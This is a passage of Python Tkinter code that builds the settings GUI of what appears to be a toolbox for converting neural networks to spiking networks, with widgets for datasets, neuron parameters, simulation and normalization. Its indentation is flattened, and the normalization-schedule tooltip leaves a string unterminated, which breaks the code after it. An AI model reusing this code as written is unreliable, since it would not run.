"""Separate thread for conversion process."""
self.res_queue = Queue()
# Create thread for performing the conversion in the background.
# Make it a daemon so it is killed when the main application is closed.
if sys.version_info[0] < 3:
self.process_thread = threading.Thread(target=test_full,
args=(self.res_queue,),
name='conversion process')
self.process_thread.daemon = True
else:
self.process_thread = threading.Thread(target=test_full,
args=(self.res_queue,),
name='conversion process',
daemon=True)
def globalparams_widgets(self):
"""Global parameters widgets."""
# Create a container for individual parameter widgets
self.globalparams_frame = tk.LabelFrame(self.main_container,
labelanchor='nw',
text="Global parameters",
relief='raised',
borderwidth='3', bg='white')
self.globalparams_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Specify general properties of your model and the steps to
include in your experiment.""")
ToolTip(self.globalparams_frame, text=tip, wraplength=750, delay=1499)
# Data-set path
dataset_frame = tk.Frame(self.globalparams_frame, bg='white')
dataset_frame.pack(**self.kwargs)
tk.Label(dataset_frame, text="Dataset", bg='white').pack(
fill='both', expand=True)
tk.Button(dataset_frame, text="Dataset path",
command=self.set_dataset_path,
font=self.header_font).pack(side='top')
self.dataset_entry = tk.Entry(
dataset_frame, textvariable=self.settings['dataset_path'],
width=20, validate='focusout', bg='white',
validatecommand=(dataset_frame.register(self.check_dataset_path),
'%P'))
self.dataset_entry.pack(fill='both', expand=True, side='left')
scroll_x = tk.Scrollbar(dataset_frame, orient=tk.HORIZONTAL,
command=self.__scroll_handler)
scroll_x.pack(fill='x', expand=True, side='right')
self.dataset_entry['xscrollcommand'] = scroll_x.set
tip = dedent("""\
Select a directory where the toolbox will find the samples to test.
Two input formats are supported:
A) .npz: Compressed numpy format.
B) .jpg: Images in directories corresponding to their class.
A) Provide at least two compressed numpy files called 'x_test.npz'
and 'y_test.npz' containing the testset and groundtruth. In
addition, if the network should be normalized, put a file
            'x_norm.npz' in the folder. This can be the training set x_train,
or a subset of it. Take care of memory limitations: If numpy can
allocate a 4 GB float32 container for the activations to be
computed during normalization, x_norm should contain not more than
4*1e9*8bit/(fc*fx*fy*32bit) = 1/n samples, where (fc, fx, fy) is
the shape of the largest layer, and n = fc*fx*fy its total cell
count.
B) The images are stored in subdirectories of the selected
'dataset_path', where the names of the subdirectories represent
their class label. The toolbox will then use
Keras.ImageDataGenerator to load and process the files batchwise.
With original data of the form (channels, num_rows, num_cols),
x_norm and x_test have dimension
(num_samples, channels*num_rows*num_cols) for a fully-connected
network, and (num_samples, channels, num_rows, num_cols) otherwise.
y_train and y_test have dimension (num_samples, num_classes).
See snntoolbox.datasets for examples how to prepare a
dataset for use in the toolbox.""")
ToolTip(dataset_frame, text=tip, wraplength=750)
# Data-set format
format_frame = tk.Frame(self.globalparams_frame, bg='white')
format_frame.pack(**self.kwargs)
tk.Radiobutton(format_frame, variable=self.settings['dataset_format'],
text='.npz', value='npz', bg='white').pack(
fill='both', side='left', expand=True)
tk.Radiobutton(format_frame, variable=self.settings['dataset_format'],
text='.jpg',
value='jpg', bg='white').pack(
fill='both', side='right', expand=True)
tip = dedent("""\
Select a directory where the toolbox will find the samples to test.
Two input formats are supported:
A) .npz: Compressed numpy format.
B) .jpg: Images in directories corresponding to their class.
See dataset path tooltip for more details.""")
ToolTip(format_frame, text=tip, wraplength=750)
# Model library
model_libs = eval(self.config.get('restrictions', 'model_libs'))
model_lib_frame = tk.Frame(self.globalparams_frame, bg='white')
model_lib_frame.pack(**self.kwargs)
tip = "The neural network library used to create the input model."
ToolTip(model_lib_frame, text=tip, wraplength=750)
tk.Label(model_lib_frame, text="Model library",
bg='white').pack(fill='both', expand=True)
model_lib_om = tk.OptionMenu(model_lib_frame,
self.settings['model_lib'],
*list(model_libs))
model_lib_om.pack(fill='both', expand=True)
# Batch size
batch_size_frame = tk.Frame(self.globalparams_frame, bg='white')
batch_size_frame.pack(**self.kwargs)
tk.Label(batch_size_frame, text="Batch size",
bg='white').pack(fill='both', expand=True)
batch_size_sb = tk.Spinbox(batch_size_frame, bg='white',
textvariable=self.settings['batch_size'],
from_=1, to_=1e9, increment=1, width=10)
batch_size_sb.pack(fill='y', expand=True, ipady=5)
tip = dedent("""\
If the builtin simulator 'INI' is used, the batch size specifies
the number of test samples that will be simulated in parallel.
            Important: When using the 'INI' simulator, the network can only be
            run with the batch size it was converted with. To run it
with a different batch size, convert the ANN from scratch.""")
ToolTip(batch_size_frame, text=tip, wraplength=700)
# Verbosity
verbose_frame = tk.Frame(self.globalparams_frame, bg='white')
verbose_frame.pack(**self.kwargs)
tk.Label(verbose_frame, text="Verbosity", bg='white').pack(fill='both',
expand=True)
[tk.Radiobutton(verbose_frame, variable=self.settings['verbose'],
text=str(i), value=i, bg='white').pack(fill='both',
side='left',
expand=True)
for i in range(4)]
tip = dedent("""\
0: No intermediate results or status reports.
1: Print progress of simulation and intermediate results.
2: Record spiketrains of all layers for one sample, and save
various plots (spiketrains, spikerates, activations,
correlations, ...)
3: Record, plot and return the membrane potential of all layers
for the last test sample. Very time consuming. Works only with
pyNN simulators.""")
ToolTip(verbose_frame, text=tip, wraplength=750)
# Set and display working directory
path_frame = tk.Frame(self.globalparams_frame, bg='white')
path_frame.pack(**self.kwargs)
tk.Button(path_frame, text="Set working dir", font=self.header_font,
command=self.set_cwd).pack(side='top')
self.path_entry = tk.Entry(
path_frame, textvariable=self.settings['path_wd'], width=20,
validate='focusout', bg='white',
validatecommand=(path_frame.register(self.check_path), '%P'))
self.path_entry.pack(fill='both', expand=True, side='left')
scroll_x2 = tk.Scrollbar(path_frame, orient=tk.HORIZONTAL,
command=self.__scroll_handler)
scroll_x2.pack(fill='x', expand=True, side='bottom')
self.path_entry['xscrollcommand'] = scroll_x2.set
tip = dedent("""\
Specify the working directory. There, the toolbox will look for
ANN models to convert or SNN models to test, load the parameters
it needs and store (normalized) parameters.""")
ToolTip(path_frame, text=tip, wraplength=750)
# Specify filename base
filename_frame = tk.Frame(self.globalparams_frame)
filename_frame.pack(**self.kwargs)
tk.Label(filename_frame, text="Filename base:", bg='white').pack(
fill='both', expand=True)
self.filename_entry = tk.Entry(
filename_frame, bg='white', width=20, validate='focusout',
textvariable=self.settings['filename_ann'],
validatecommand=(filename_frame.register(self.check_file), '%P'))
self.filename_entry.pack(fill='both', expand=True, side='bottom')
tip = dedent("""\
Base name of all loaded and saved files during this run. The ANN
model to be converted is expected to be named '<basename>'.
The toolbox will save and load converted SNN models under the
name 'snn_<basename>'. When exporting a converted spiking net to
test it in a specific simulator, the toolbox writes the exported
SNN to files named ``snn_<basename>_<simulator>``.""")
ToolTip(filename_frame, text=tip, wraplength=750)
def cellparams_widgets(self):
"""Create a container for individual parameter widgets."""
self.cellparams_frame = tk.LabelFrame(
self.main_container, labelanchor='nw', text="Cell\n parameters",
relief='raised', borderwidth='3', bg='white')
self.cellparams_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Specify parameters of individual neuron cells in the
converted spiking network. Some are simulator specific.""")
ToolTip(self.cellparams_frame, text=tip, wraplength=750, delay=1499)
# Threshold
v_thresh_frame = tk.Frame(self.cellparams_frame, bg='white')
v_thresh_frame.pack(**self.kwargs)
tk.Label(v_thresh_frame, text="v_thresh", bg='white').pack(fill='both',
expand=True)
v_thresh_sb = tk.Spinbox(v_thresh_frame,
textvariable=self.settings['v_thresh'],
from_=-1e3, to_=1e3, increment=1e-3, width=10)
v_thresh_sb.pack(fill='y', expand=True, ipady=3)
tip = "Threshold in mV defining the voltage at which a spike is fired."
ToolTip(v_thresh_frame, text=tip, wraplength=750)
# Refractory time constant
tau_refrac_frame = tk.Frame(self.cellparams_frame, bg='white')
tau_refrac_frame.pack(**self.kwargs)
tk.Label(tau_refrac_frame, text="tau_refrac",
bg='white').pack(fill='both', expand=True)
tau_refrac_sb = tk.Spinbox(tau_refrac_frame,
textvariable=self.settings['tau_refrac'],
width=10, from_=0, to_=1e3, increment=0.01)
tau_refrac_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Duration of refractory period in milliseconds of the neurons
after spiking.""")
ToolTip(tau_refrac_frame, text=tip, wraplength=750)
# Reset
v_reset_frame = tk.Frame(self.cellparams_frame, bg='white')
v_reset_frame.pack(**self.kwargs)
self.v_reset_label = tk.Label(v_reset_frame, text="v_reset",
state=self.settings['state_pyNN'].get(),
bg='white')
self.v_reset_label.pack(fill='both', expand=True)
self.v_reset_sb = tk.Spinbox(
v_reset_frame, disabledbackground='#eee', width=10,
textvariable=self.settings['v_reset'], from_=-1e3, to_=1e3,
increment=0.1, state=self.settings['state_pyNN'].get())
self.v_reset_sb.pack(fill='y', expand=True, ipady=3)
tip = "Reset potential in mV of the neurons after spiking."
ToolTip(v_reset_frame, text=tip, wraplength=750)
# Resting potential
v_rest_frame = tk.Frame(self.cellparams_frame, bg='white')
v_rest_frame.pack(**self.kwargs)
self.v_rest_label = tk.Label(v_rest_frame, text="v_rest", bg='white',
state=self.settings['state_pyNN'].get())
self.v_rest_label.pack(fill='both', expand=True)
self.v_rest_sb = tk.Spinbox(
v_rest_frame, disabledbackground='#eee', width=10,
textvariable=self.settings['v_rest'], from_=-1e3, to_=1e3,
increment=0.1, state=self.settings['state_pyNN'].get())
self.v_rest_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Resting membrane potential in mV.
Only relevant in pyNN-simulators.""")
ToolTip(v_rest_frame, text=tip, wraplength=750)
# e_rev_E
e_rev_exc_frame = tk.Frame(self.cellparams_frame, bg='white')
e_rev_exc_frame.pack(**self.kwargs)
self.e_rev_E_label = tk.Label(e_rev_exc_frame, text="e_rev_E",
state=self.settings['state_pyNN'].get(),
bg='white')
self.e_rev_E_label.pack(fill='both', expand=True)
self.e_rev_E_sb = tk.Spinbox(
e_rev_exc_frame, disabledbackground='#eee', width=10,
textvariable=self.settings['e_rev_E'], from_=-1e-3, to_=1e3,
increment=0.1, state=self.settings['state_pyNN'].get())
self.e_rev_E_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Reversal potential for excitatory input in mV.
Only relevant in pyNN-simulators.""")
ToolTip(e_rev_exc_frame, text=tip, wraplength=750)
# e_rev_I
e_rev_inh_frame = tk.Frame(self.cellparams_frame, bg='white')
e_rev_inh_frame.pack(**self.kwargs)
self.e_rev_I_label = tk.Label(e_rev_inh_frame, text="e_rev_I",
state=self.settings['state_pyNN'].get(),
bg='white')
self.e_rev_I_label.pack(fill='both', expand=True)
self.e_rev_I_sb = tk.Spinbox(
e_rev_inh_frame, disabledbackground='#eee', width=10,
textvariable=self.settings['e_rev_I'], from_=-1e3, to_=1e3,
increment=0.1, state=self.settings['state_pyNN'].get())
self.e_rev_I_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Reversal potential for inhibitory input in mV.
Only relevant in pyNN-simulators.""")
ToolTip(e_rev_inh_frame, text=tip, wraplength=750)
# i_offset
i_offset_frame = tk.Frame(self.cellparams_frame, bg='white')
i_offset_frame.pack(**self.kwargs)
self.i_offset_label = tk.Label(
i_offset_frame, text="i_offset", bg='white',
state=self.settings['state_pyNN'].get())
self.i_offset_label.pack(fill='both', expand=True)
self.i_offset_sb = tk.Spinbox(i_offset_frame, width=10,
textvariable=self.settings['i_offset'],
from_=-1e3, to_=1e3, increment=1,
state=self.settings['state_pyNN'].get(),
disabledbackground='#eee')
self.i_offset_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Offset current in nA.
Only relevant in pyNN-simulators.""")
ToolTip(i_offset_frame, text=tip, wraplength=750)
# Membrane capacitance
cm_frame = tk.Frame(self.cellparams_frame, bg='white')
cm_frame.pack(**self.kwargs)
self.cm_label = tk.Label(cm_frame, text="C_mem", bg='white',
state=self.settings['state_pyNN'].get(), )
self.cm_label.pack(fill='both', expand=True)
self.cm_sb = tk.Spinbox(cm_frame, textvariable=self.settings['cm'],
from_=1e-3, to_=1e3, increment=1e-3, width=10,
state=self.settings['state_pyNN'].get(),
disabledbackground='#eee')
self.cm_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Membrane capacitance in nF.
Only relevant in pyNN-simulators.""")
ToolTip(cm_frame, text=tip, wraplength=750)
# tau_m
tau_m_frame = tk.Frame(self.cellparams_frame, bg='white')
tau_m_frame.pack(**self.kwargs)
self.tau_m_label = tk.Label(tau_m_frame, text="tau_m", bg='white',
state=self.settings['state_pyNN'].get())
self.tau_m_label.pack(fill='both', expand=True)
self.tau_m_sb = tk.Spinbox(tau_m_frame, disabledbackground='#eee',
textvariable=self.settings['tau_m'],
from_=1, to_=1e6, increment=1, width=10,
state=self.settings['state_pyNN'].get())
self.tau_m_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Membrane time constant in milliseconds.
Only relevant in pyNN-simulators.""")
ToolTip(tau_m_frame, text=tip, wraplength=750)
# tau_syn_E
tau_syn_exc_frame = tk.Frame(self.cellparams_frame, bg='white')
tau_syn_exc_frame.pack(**self.kwargs)
self.tau_syn_E_label = tk.Label(
tau_syn_exc_frame, text="tau_syn_E", bg='white',
state=self.settings['state_pyNN'].get())
self.tau_syn_E_label.pack(fill='both', expand=True)
self.tau_syn_E_sb = tk.Spinbox(tau_syn_exc_frame, width=10,
textvariable=self.settings['tau_syn_E'],
from_=1e-3, to_=1e3, increment=1e-3,
state=self.settings['state_pyNN'].get(),
disabledbackground='#eee')
self.tau_syn_E_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Decay time of the excitatory synaptic conductance in
milliseconds.
Only relevant in pyNN-simulators.""")
ToolTip(tau_syn_exc_frame, text=tip, wraplength=750)
# tau_syn_I
tau_syn_inh_frame = tk.Frame(self.cellparams_frame, bg='white')
tau_syn_inh_frame.pack(**self.kwargs)
self.tau_syn_I_label = tk.Label(
tau_syn_inh_frame, text="tau_syn_I", bg='white',
state=self.settings['state_pyNN'].get())
self.tau_syn_I_label.pack(fill='both', expand=True)
self.tau_syn_I_sb = tk.Spinbox(tau_syn_inh_frame, width=10,
textvariable=self.settings['tau_syn_I'],
from_=1e-3, to_=1e3, increment=1e-3,
state=self.settings['state_pyNN'].get(),
disabledbackground='#eee')
self.tau_syn_I_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Decay time of the inhibitory synaptic conductance in
milliseconds.
Only relevant in pyNN-simulators.""")
ToolTip(tau_syn_inh_frame, text=tip, wraplength=750)
def simparams_widgets(self):
"""Create a container for individual parameter widgets."""
self.simparams_frame = tk.LabelFrame(self.main_container,
labelanchor='nw',
text="Simulation\n parameters",
relief='raised',
borderwidth='3', bg='white')
self.simparams_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Specify parameters concerning the simulation of the converted
spiking network. Some are simulator specific.""")
ToolTip(self.simparams_frame, text=tip, wraplength=750, delay=1499)
# Simulator
simulators = eval(self.config.get('restrictions', 'simulators'))
simulator_frame = tk.Frame(self.simparams_frame, bg='white')
simulator_frame.pack(**self.kwargs)
tip = dedent("""\
Choose a simulator to run the converted spiking network with.""")
ToolTip(simulator_frame, text=tip, wraplength=750)
tk.Label(simulator_frame, text="Simulator", bg='white').pack(
fill='both', expand=True)
simulator_om = tk.OptionMenu(simulator_frame,
self.settings['simulator'],
*list(simulators),
command=self.toggle_state_pynn)
simulator_om.pack(fill='both', expand=True)
# Time resolution
dt_frame = tk.Frame(self.simparams_frame, bg='white')
dt_frame.pack(**self.kwargs)
tk.Label(dt_frame, text="dt", bg='white').pack(fill='x', expand=True)
dt_sb = tk.Spinbox(dt_frame, textvariable=self.settings['dt'],
from_=1e-3, to_=1e3, increment=1e-3, width=10)
dt_sb.pack(fill='y', expand=True, ipady=3)
tip = "Time resolution of spikes in milliseconds."
ToolTip(dt_frame, text=tip, wraplength=750)
# Duration
duration_frame = tk.Frame(self.simparams_frame, bg='white')
duration_frame.pack(**self.kwargs)
tk.Label(duration_frame, text="duration", bg='white').pack(fill='y',
expand=True)
duration_sb = tk.Spinbox(duration_frame, width=10, increment=1,
from_=self.settings['dt'].get(), to_=1e9,
textvariable=self.settings['duration'])
duration_sb.pack(fill='y', expand=True, ipady=3)
tip = "Runtime of simulation of one input in milliseconds."
ToolTip(duration_frame, text=tip, wraplength=750)
# Poisson input
poisson_input_cb = tk.Checkbutton(
self.simparams_frame, text="Poisson input", bg='white',
variable=self.settings['poisson_input'], height=2, width=20,
command=self.toggle_poisson_input_state)
poisson_input_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, the input samples will be converted to Poisson
            spiketrains. The probability for an input neuron to fire is
proportional to the analog value of the corresponding pixel, and
limited by the parameter 'input_rate' below. For instance,
with an 'input_rate' of 700, a fully-on pixel will elicit a
Poisson spiketrain of 700 Hz. Turn off for a less noisy
simulation. Currently, turning off Poisson input is only possible
in INI simulator.""")
ToolTip(poisson_input_cb, text=tip, wraplength=750)
# Maximum input firing rate
input_rate_frame = tk.Frame(self.simparams_frame, bg='white')
input_rate_frame.pack(**self.kwargs)
self.input_rate_label = tk.Label(input_rate_frame, text="input_rate",
bg='white')
self.input_rate_label.pack(fill='both', expand=True)
self.input_rate_sb = tk.Spinbox(
input_rate_frame, textvariable=self.settings['input_rate'],
from_=1, to_=10000, increment=1, width=10,
disabledbackground='#eee')
self.input_rate_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Poisson spike rate in Hz for a fully-on pixel of input image. Only
relevant when 'Poisson input' checkbutton enabled. Note that the
input_rate is limited by the maximum firing rate supported by the
simulator (given by the inverse time resolution 1000 * 1 / dt Hz).
""")
ToolTip(input_rate_frame, text=tip, wraplength=750)
# Reset mechanism
reset_frame = tk.Frame(self.simparams_frame, bg='white')
reset_frame.pack(**self.kwargs)
tk.Label(reset_frame, text="Reset mechanism", bg='white').pack(
fill='both', expand=True)
tk.Radiobutton(reset_frame, variable=self.settings['reset'],
text='Reset to zero', value='Reset to zero',
bg='white').pack(fill='both', side='top', expand=True)
tk.Radiobutton(reset_frame, variable=self.settings['reset'],
text='Reset by subtraction',
value='Reset by subtraction', bg='white').pack(
fill='both', side='bottom', expand=True)
tip = dedent("""\
Reset to zero:
After spike, the membrane potential is set to the resting
potential.
Reset by subtraction:
After spike, the membrane potential is reduced by a value
equal to the threshold.""")
ToolTip(reset_frame, text=tip, wraplength=750)
# Binarize weights
binarize_weights_cb = tk.Checkbutton(
self.simparams_frame, text="Binarize weights", bg='white',
variable=self.settings['binarize_weights'], height=2, width=20)
binarize_weights_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, the weights are binarized.""")
ToolTip(binarize_weights_cb, text=tip, wraplength=750)
# MaxPool
maxpool_types = eval(self.config.get('restrictions', 'maxpool_types'))
maxpool_frame = tk.Frame(self.simparams_frame, bg='white')
maxpool_frame.pack(**self.kwargs)
tip = dedent("""\
Implementation variants of spiking MaxPooling layers.
fir_max: accumulated absolute firing rate
exp_max: exponentially decaying average of firing rate
avg_max: moving average of firing rate
binary_tanh: Sign function, used in BinaryNet.
binary_sigmoid: Step function, used in BinaryNet.""")
ToolTip(maxpool_frame, text=tip, wraplength=750)
tk.Label(maxpool_frame, text="MaxPool type", bg='white').pack(
fill='both', expand=True)
maxpool_om = tk.OptionMenu(
maxpool_frame, self.settings['maxpool_type'], *list(maxpool_types))
maxpool_om.pack(fill='both', expand=True)
# Delay
delay_frame = tk.Frame(self.simparams_frame, bg='white')
delay_frame.pack(**self.kwargs)
self.delay_label = tk.Label(delay_frame, text="delay", bg='white',
state=self.settings['state_pyNN'].get())
self.delay_label.pack(fill='both', expand=True)
self.delay_sb = tk.Spinbox(delay_frame, disabledbackground='#eee',
textvariable=self.settings['delay'],
from_=self.settings['dt'].get(), to_=1000,
increment=1, width=10,
state=self.settings['state_pyNN'].get())
self.delay_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Delay in milliseconds. Must be equal to or greater than the
resolution. Only relevant in pyNN-simulators.""")
ToolTip(delay_frame, text=tip, wraplength=750)
# Number of samples to test
num_to_test_frame = tk.Frame(self.simparams_frame, bg='white')
num_to_test_frame.pack(**self.kwargs)
self.num_to_test_label = tk.Label(
num_to_test_frame, bg='white', text="num_to_test",
state=self.settings['state_num_to_test'].get())
self.num_to_test_label.pack(fill='both', expand=True)
self.num_to_test_sb = tk.Spinbox(
num_to_test_frame, state=self.settings['state_num_to_test'].get(),
textvariable=self.settings['num_to_test'], from_=1, to_=1e9,
increment=1, width=10, disabledbackground='#eee')
self.num_to_test_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Number of samples to test. Only relevant in pyNN-simulators.""")
ToolTip(num_to_test_frame, text=tip, wraplength=750)
# Test specific samples
sample_frame = tk.Frame(self.simparams_frame, bg='white')
sample_frame.pack(**self.kwargs)
tk.Label(sample_frame, text="Samples to test:", bg='white').pack(
fill='both', expand=True)
self.sample_entry = tk.Entry(
sample_frame, bg='white', width=20, validate='key',
textvariable=self.settings['sample_idxs_to_test'],
validatecommand=(sample_frame.register(self.check_sample), '%P'))
self.sample_entry.pack(fill='both', expand=True, side='bottom')
tip = dedent(
"""List the indices of specific samples you want to test.""")
ToolTip(sample_frame, text=tip, wraplength=750)
# Name of directory where to save plots
runlabel_frame = tk.Frame(self.simparams_frame, bg='white')
runlabel_frame.pack(**self.kwargs)
tk.Label(runlabel_frame, text='run label', bg='white').pack(
fill='both', expand=True)
runlabel_entry = tk.Entry(
runlabel_frame, bg='white', textvariable=self.settings['runlabel'],
validate='focusout', validatecommand=(
runlabel_frame.register(self.check_runlabel), '%P'))
runlabel_entry.pack(fill='both', expand=True, side='bottom')
tip = dedent("""\
Give your simulation run a name. If verbosity is high, the
resulting plots will be saved in <cwd>/log/gui/<runlabel>.""")
ToolTip(runlabel_frame, text=tip, wraplength=750)
def tools_widgets(self):
"""Create tools widgets."""
self.tools_frame = tk.LabelFrame(self.main_container, labelanchor='nw',
text='Tools', relief='raised',
borderwidth='3', bg='white')
self.tools_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Specify the tools to apply in your experiment.""")
ToolTip(self.tools_frame, text=tip, wraplength=750, delay=1499)
# Evaluate ANN
self.evaluate_ann_cb = tk.Checkbutton(
self.tools_frame, text="Evaluate ANN", bg='white',
variable=self.settings['evaluate_ann'], height=2, width=20)
self.evaluate_ann_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, test the input model before and after it is parsed, to
ensure we do not lose performance. (Parsing extracts all necessary
information from the input model and creates a new network with
some simplifications in preparation for conversion to SNN.)
If you also enabled 'normalization' (see parameter 'normalize'
below), then the network will be evaluated again after
normalization. This operation should preserve accuracy as well.""")
ToolTip(self.evaluate_ann_cb, text=tip, wraplength=750)
# Normalize
self.normalize_cb = tk.Checkbutton(
self.tools_frame, text="Normalize", height=2, width=20,
bg='white', variable=self.settings['normalize'])
self.normalize_cb.pack(**self.kwargs)
tip = dedent("""\
Only relevant when converting a network, not during simulation.
If enabled, the parameters of the spiking network will be
normalized by the highest activation value, or by the ``n``-th
percentile (see parameter ``percentile`` below).""")
ToolTip(self.normalize_cb, text=tip, wraplength=750)
# Convert ANN
convert_cb = tk.Checkbutton(self.tools_frame, text="Convert",
variable=self.settings['convert'],
height=2, width=20, bg='white')
convert_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, load an ANN from working directory (see setting
'working dir') and convert it to spiking.""")
ToolTip(convert_cb, text=tip, wraplength=750)
# Simulate
simulate_cb = tk.Checkbutton(self.tools_frame, text="Simulate",
variable=self.settings['simulate'],
height=2, width=20, bg='white')
simulate_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, try to load SNN from working directory (see setting
'working dir') and test it on the specified simulator (see
parameter 'simulator').""")
ToolTip(simulate_cb, text=tip, wraplength=750)
# Overwrite
overwrite_cb = tk.Checkbutton(self.tools_frame, text="Overwrite",
variable=self.settings['overwrite'],
height=2, width=20, bg='white')
overwrite_cb.pack(**self.kwargs)
tip = dedent("""\
If disabled, the save methods will ask for permission to
overwrite files before writing parameters, activations, models
etc. to disk.""")
ToolTip(overwrite_cb, text=tip, wraplength=750)
# Start experiment
self.start_processing_bt = tk.Button(
self.tools_frame, text="Start", font=self.header_font,
foreground='#008000', command=self.start_processing,
state=self.start_state.get())
self.start_processing_bt.pack(**self.kwargs)
tip = dedent("""\
Start processing the steps specified above. Settings can not be
changed during the run.""")
ToolTip(self.start_processing_bt, text=tip, wraplength=750)
# Stop experiment
self.stop_processing_bt = tk.Button(
self.tools_frame, text="Stop", font=self.header_font,
foreground='red', command=self.stop_processing)
self.stop_processing_bt.pack(**self.kwargs)
tip = dedent("""\
Stop the process at the next opportunity. This will usually be
between steps of normalization, evaluation, conversion and
simulation.""")
ToolTip(self.stop_processing_bt, text=tip, wraplength=750)
def edit_normalization_settings(self):
"""Settings menu for parameter normalization"""
self.normalization_settings_container = tk.Toplevel(bg='white')
self.normalization_settings_container.geometry('300x400')
self.normalization_settings_container.wm_title(
'Normalization settings')
self.normalization_settings_container.protocol(
'WM_DELETE_WINDOW', self.normalization_settings_container.destroy)
tk.Button(self.normalization_settings_container, text='Save and close',
command=self.normalization_settings_container.destroy).pack()
# Percentile
percentile_frame = tk.Frame(self.normalization_settings_container,
bg='white')
percentile_frame.pack(**self.kwargs)
self.percentile_label = tk.Label(percentile_frame, text="Percentile",
bg='white')
self.percentile_label.pack(fill='both', expand=True)
self.percentile_sb = tk.Spinbox(
percentile_frame, bg='white', from_=0, to_=100, increment=0.001,
textvariable=self.settings['percentile'], width=10,
disabledbackground='#eee')
self.percentile_sb.pack(fill='y', expand=True, ipady=5)
tip = dedent("""\
Use the activation value in the specified percentile for
normalization. Set to '50' for the median, '100' for the max.
Typical values are 99, 99.9, 100.""")
ToolTip(percentile_frame, text=tip, wraplength=700)
# Normalization schedule
normalization_schedule_cb = tk.Checkbutton(
self.normalization_settings_container,
text="Normalization schedule",
variable=self.settings['normalization_schedule'],
height=2, width=20, bg='white')
normalization_schedule_cb.pack(**self.kwargs)
tip = dedent("""\
            Reduce the normalization factor for each layer.
ToolTip(normalization_schedule_cb, text=tip, wraplength=750)
# Online normalization
online_normalization_cb = tk.Checkbutton(
self.normalization_settings_container, text="Online normalization",
variable=self.settings['online_normalization'],
height=2, width=20, bg='white')
online_normalization_cb.pack(**self.kwargs)
tip = dedent("""\
The converted spiking network performs best if the average firing
rates of each layer are not higher but also not much lower than the
maximum rate supported by the simulator (inverse time resolution).
Normalization eliminates saturation but introduces undersampling
(parameters are normalized with respect to the highest value in a
batch). To overcome this, the spikerates of each layer are
monitored during simulation. If they drop below the maximum firing
rate by more than 'diff to max rate', we set the threshold of
the layer to its highest rate.""")
ToolTip(online_normalization_cb, text=tip, wraplength=750)
# Difference to maximum firing rate
diff_to_max_rate_frame = tk.Frame(
self.normalization_settings_container, bg='white')
diff_to_max_rate_frame.pack(**self.kwargs)
self.diff_to_max_rate_label = tk.Label(
diff_to_max_rate_frame, bg='white', text="diff_to_max_rate")
self.diff_to_max_rate_label.pack(fill='both', expand=True)
self.diff_to_max_rate_sb = tk.Spinbox(
diff_to_max_rate_frame, from_=0, to_=10000, increment=1, width=10,
textvariable=self.settings['diff_to_max_rate'])
self.diff_to_max_rate_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
If the highest firing rate of neurons in a layer drops below the
maximum firing rate by more than 'diff to max rate', we set the
threshold of the layer to its highest rate.
Set the parameter in Hz.""")
ToolTip(diff_to_max_rate_frame, text=tip, wraplength=750)
# Minimum firing rate
diff_to_min_rate_frame = tk.Frame(
self.normalization_settings_container, bg='white')
diff_to_min_rate_frame.pack(**self.kwargs)
self.diff_to_min_rate_label = tk.Label(
diff_to_min_rate_frame, bg='white', text="diff_to_min_rate")
self.diff_to_min_rate_label.pack(fill='both', expand=True)
self.diff_to_min_rate_sb = tk.Spinbox(
diff_to_min_rate_frame, from_=0, to_=10000, increment=1, width=10,
textvariable=self.settings['diff_to_min_rate'])
self.diff_to_min_rate_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
            When the firing rates of a layer are below this value, the weights
will NOT be modified in the feedback mechanism described in
'online_normalization'. This is useful in the beginning of a
simulation, when higher layers need some time to integrate up a
sufficiently high membrane potential.""")
ToolTip(diff_to_min_rate_frame, text=tip, wraplength=750)
# Time-step fraction
timestep_fraction_frame = tk.Frame(
self.normalization_settings_container, bg='white')
timestep_fraction_frame.pack(**self.kwargs)
self.timestep_fraction_label = tk.Label(
timestep_fraction_frame, bg='white', text="timestep_fraction")
self.timestep_fraction_label.pack(fill='both', expand=True)
self.timestep_fraction_sb = tk.Spinbox(
timestep_fraction_frame, from_=0, to_=1000, increment=1, width=10,
textvariable=self.settings['timestep_fraction'])
self.timestep_fraction_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
If set to 10 (default), the parameter modification mechanism
described in 'online_normalization' will be performed at every 10th
timestep.""")
ToolTip(timestep_fraction_frame, text=tip, wraplength=750)
def edit_experimental_settings(self):
"""Settings menu for experimental features."""
self.experimental_settings_container = tk.Toplevel(bg='white')
self.experimental_settings_container.geometry('300x400')
self.experimental_settings_container.wm_title('Experimental settings')
self.experimental_settings_container.protocol(
'WM_DELETE_WINDOW', self.experimental_settings_container.destroy)
tk.Button(self.experimental_settings_container, text='Save and close',
command=self.experimental_settings_container.destroy).pack()
experimental_settings_cb = tk.Checkbutton(
self.experimental_settings_container,
text="Enable experimental settings",
variable=self.settings['experimental_settings'],
height=2, width=20, bg='white')
experimental_settings_cb.pack(expand=True)
tip = dedent("""Enable experimental settings.""")
ToolTip(experimental_settings_cb, text=tip, wraplength=750)
def edit_dataset_settings(self):
"""Settings menu for dataset parameters."""
dataset_settings_container = tk.Toplevel(bg='white')
dataset_settings_container.wm_title('Dataset settings')
dataset_settings_container.protocol(
'WM_DELETE_WINDOW', dataset_settings_container.destroy)
tk.Button(dataset_settings_container, text='Save and close',
